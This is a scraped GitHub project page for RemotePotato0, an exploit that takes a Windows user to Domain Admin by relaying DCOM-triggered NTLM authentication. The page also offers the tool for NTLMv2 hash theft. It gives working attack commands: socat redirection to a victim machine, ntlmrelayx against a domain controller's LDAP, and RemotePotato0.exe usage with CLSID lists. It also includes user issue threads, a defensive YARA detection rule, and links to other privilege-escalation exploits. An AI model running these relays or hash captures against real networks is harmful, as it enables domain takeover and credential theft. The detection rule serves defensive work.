Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

Overview

RemotePotato0

Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.

RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.

Briefly:

It abuses the DCOM activation service and trigger an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows to grab and steal NTLMv2 hashes of every users logged on a machine.

Examples

Attacker machine (10.0.0.20)

Victim machine (10.0.0.45)

Victim Domain Controller (10.0.0.10)

Module 0 - Rpc2Http cross protocol relay server + potato trigger

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

Note: if you are on Windows Server <= 2016 you can avoid the network redirector (socat) because the oxid resolution can be performed locally.

query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

Module 1 - Rpc2Http cross protocol relay server

.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20 
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Module 2 - Rpc capture (hash) server + potato trigger

query user
.\RemotePotato0.exe -m 2 -s 1

Module 3 - Rpc capture (hash) server

.\RemotePotato0.exe -m 3 -l 9997
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm

Usage



        RemotePotato0
        @splinter_code & @decoder_it



Mandatory args:
-m module
        Allowed values:
        0 - Rpc2Http cross protocol relay server + potato trigger (default)
        1 - Rpc2Http cross protocol relay server
        2 - Rpc capture (hash) server + potato trigger
        3 - Rpc capture (hash) server


Other args: (someone could be mandatory and/or optional based on the module you use)
-r Remote HTTP relay server ip
-t Remote HTTP relay server port (Default 80)
-x Rogue Oxid Resolver ip (default 127.0.0.1)
-p Rogue Oxid Resolver port (default 9999)
-l RPC Relay server listening port (Default 9997)
-s Session id for the Cross Session Activation attack (default disabled)
-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})

Demo

Cross session activation

Hash Stealer

CLSID List

A list of usable CLSID on various Windows version:

Windows Server 2019

{0002DF02-0000-0000-C000-000000000046} - BrowserBroker Class   
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4} - AuthBrokerUI 
{5167B42F-C111-47A1-ACC4-8EABE61B0B54} - Easconsent.dll 
{924DC564-16A6-42EB-929A-9A61FA7DA06F} - Authentication UI CredUI Out of Proc Helper for Non-AppContainer Clients  
{934b410c-43e4-415e-9935-fbc081ba93a9} - UserInfoDialog   
{BA441419-0B3F-4FB6-A903-D16CC14CCA44} - CLSID_LockScreenContentionFlyout 
{c58ca859-80bc-48df-8f06-ffa94a405bff} - Picker Host   
{f65817c8-dd85-4136-89f0-b9d12939f2c4} - IsolatedMessageDialogFactory  
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} - SPPUIObjectInteractive Class
{f8842f8e-dafe-4b37-9d38-4e0714a61149} - CastServerInteractiveUser

Windows Server 2016

{924DC564-16A6-42EB-929A-9A61FA7DA06F}
{f65817c8-dd85-4136-89f0-b9d12939f2c4}
{BA441419-0B3F-4FB6-A903-D16CC14CCA44}
{0ea79562-d4f6-47ba-b7f2-1e9b06ba16a4}
{934b410c-43e4-415e-9935-fbc081ba93a9}
{f8842f8e-dafe-4b37-9d38-4e0714a61149}
{0002DF02-0000-0000-C000-000000000046}
{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
{c58ca859-80bc-48df-8f06-ffa94a405bff}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

Windows Server 2008 R2

{FCC74B77-EC3E-4dd8-A80B-008A702075A9}
{9BA05972-F6A8-11CF-A442-00A0C90A8F39}
{F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}

You can find a more complete list here --> http://ohpe.it/juicy-potato/CLSID/

Detection

Yara rule to detect RemotePotato0 binary:

rule SentinelOne_RemotePotato0_privesc {
    meta:
        author = "SentinelOne"
        description = "Detects RemotePotato0 binary"
        reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
        
    strings:
        $import1 = "CoGetInstanceFromIStorage"
        $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
        $meow_header = { 4d 45 4f 57 }
        $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
        $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
        
    condition:        
        (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}

Authors

Credits

References

Issues
  • Potato newb question :-)

    Potato newb question :-)

    Hello!

    I've been reading the tech papers about this exploit and, admittedly, it caused my brain to leak out of my ears and onto my keyboard :-)

    So I staged up a test DC, joined some Win10 machines to it and looked to recreate the exploit in action. It worked as advertised, which was awesome! However, I found that by default the average/default AD user doesn't have WinRm capability into anything in my server subnet, so I had to explicitly add my test user (Student10) into the Remote Management Users group. Once I did that and ran RemotePotato0, the fireworks flew:

    image

    So my newb question is: do you think in most AD environments this exploit is slightly less of a threat unless the admins have specifically configured a bunch of users/groups to have WinRm/SSH privs? Or is it a "I'm not doing it right" kind of situation where I can leverage RemotePotato0 in more common configuration scenarios?

    Thanks! Brian

    opened by braimee 1
  • CLSID not found

    CLSID not found

    I am attempting to use this and I got the following output on the user machine.

    C:\Users\user\Documents>.\RemotePotato0.exe -r 10.1.1.69 -p 1111
    [*] Starting the NTLM relay attack, remember to forward tcp port 135 on 10.1.1.69 to your victim machine on port 1111 before and to launch ntlmrelayx on 10.1.1.69!!
    [*] RPC relay server listening on port 9997 ...
    [*] Calling CoGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
    [*] Starting RogueOxidResolver RPC Server listening on port 1111 ...
    [*] IStoragetrigger written: 104 bytes
    [!] Error. CLSID {5167B42F-C111-47A1-ACC4-8EABE61B0B54} not found. Bad path to object.
    

    The user machine is Windows 2016 Standard (build:14393). Do I have to use a different CLSID?

    opened by metac0rtex 1
  • JuicyPotato trigger does not work anymore in Windows pre 2019

    JuicyPotato trigger does not work anymore in Windows pre 2019

    On windows server prior to 2019 version the JuicyPotato trigger (the one not requiring an external oxid resolution) does not work anymore. It seems that at certain point in time MS has backported the fix of win serv 2019 to the older versions.

    See --> https://twitter.com/decoder_it/status/1493916092493877248

    A fix should be to use an external oxid resolver like it's already happening for windows server 2019.

    bug 
    opened by antonioCoco 0
  • Bug in RPC capture server

    Bug in RPC capture server

    The RPC capture server in charge to grab the ntlmv2 response is using the hardcoded value 268 to hold the data. While there are no particular bugs found on the tested windows, it could have some bugs for win11 and server 2022. The allocation should be dynamically managed with a malloc() call instead of using a local array with fixed size --> https://github.com/antonioCoco/RemotePotato0/blob/main/RPCCaptureServer.cpp#L168

    bug enhancement 
    opened by antonioCoco 0
Releases(1.2)
Owner
- @splinter_code - reverse engineering / malware analysis / obfuscation / windows internals
null
CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day

WindowsMDM-LPE-0Day Works best on Windows 11 CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still

Exploit Blizzard 31 Jul 20, 2022
Exploit allowing you to read registry hives as non-admin on Windows 10 and 11

HiveNightmare aka SeriousSam, or now CVE-2021–36934. Exploit allowing you to read any registry hives as non-admin. What is this? An zero day exploit f

Kevin Beaumont 598 Aug 3, 2022
Local Privilege Escalation Edition for CVE-2021-1675

Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-34527 Local Privilege Escalation implementation of the CVE-2021-1675/CVE-2021-34527 (a.k.

Halil Dalabasmaz 330 Jul 27, 2022
Bring your own print driver privilege escalation tool

Concealed Position Concealed Position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Spec

Jacob Baines 208 Jul 16, 2022
SystemGap - Maintenance Tools after privilege escalation

SystemGap 适用于解决不稳定Windows漏洞提权成功后进行权限驻守的办法 SystemGap - 监听者 SystemGap 负责监听一个任意用户可读写的匿名管道,从管道中读取命令进行执行 SystemGapClient - 发送者 SystemGapClient 负责向匿名管道中传入指令

倾旋 37 Jul 9, 2022
CVE-2021-4034 One day for the polkit privilege escalation exploit

CVE-2021-4034 One day for the polkit privilege escalation exploit Just execute make, ./cve-2021-4034 and enjoy your root shell. The original advisory

Davide Berardi 1.6k Aug 6, 2022
PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

CVE-2021-4034 PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) https://seclists.org/oss-sec/2022/q1/80 http

Andris Raugulis 892 Jul 31, 2022
Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on Linux distributions based on U

Oliver Lyak 573 Jul 29, 2022
CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept

CVE-2021-4034 Proof of Concept Qualys researches found a pretty cool local privilege escalation vulnerability in Polkit's pkexec: writeup, tweet. This

Marco Bonelli 20 Jun 22, 2022
This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexec

pwnkit (CVE-2021-4034) Privilege Escalation exploit sample This repository contains an exploit of CVE-2021-4034, a local privilege escalation in pkexe

Peter Gottesman 26 Jul 19, 2022
An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec

CVE-2021-4034 Exploit Usage $ git clone https://github.com/whokilleddb/CVE-2021-4034 $ cd CVE-2021-4034 $ make [!] CVE-2021-4034 Exploit By whokilledd

whokilleddb 3 Jun 30, 2022
This is just another Potato to get SYSTEM via SeImpersonate privileges.

MultiPotato First of all - credit to @splinter_code & @decoder_it for RoguePotato as this code heavily bases on it. This is just another Potato to get

null 426 Jul 27, 2022
Just another short video app (not tiktok) but 3 in 1.

Short videos app - India Another short videos app for Hindi audience. Made with 3 different apis: Moj app Josh app Chingari app Authetication No authe

Not Your Surya 2 Jan 6, 2022
This is a prank windows malware, is only for fun, it's just for fun, it's not harmful

DBUSTER-PRO (C) 2021-2022 DioBrando This is a prank windows malware, just for fun, nothing harmful. I will teach you how to compile, and remove malwar

Dio brando 8 Apr 15, 2022
Plex media server local privilige escalation poc - CVE-2021-42835

Local Privilege PlEXcalasion - CVE-2021-42835 Plex Media Server for Windows prior to version 1.25.0.5282, vulnerable to Time Of Check Time Of Use (TOC

null 6 May 24, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 415 Jul 28, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 415 Jul 28, 2022
Kernel mode WinDbg extension and PoCs for token privilege investigation.

PrivFu Kernel mode WinDbg extension and PoCs for testing how token privileges work. There are notable repository and articles about token privilege ab

null 343 Aug 1, 2022
stb single-file public domain libraries for C/C++

stb single-file public domain (or MIT licensed) libraries for C/C++ Noteworthy: image loader: stb_image.h image writer: stb_image_write.h image resize

Sean Barrett 19.5k Aug 7, 2022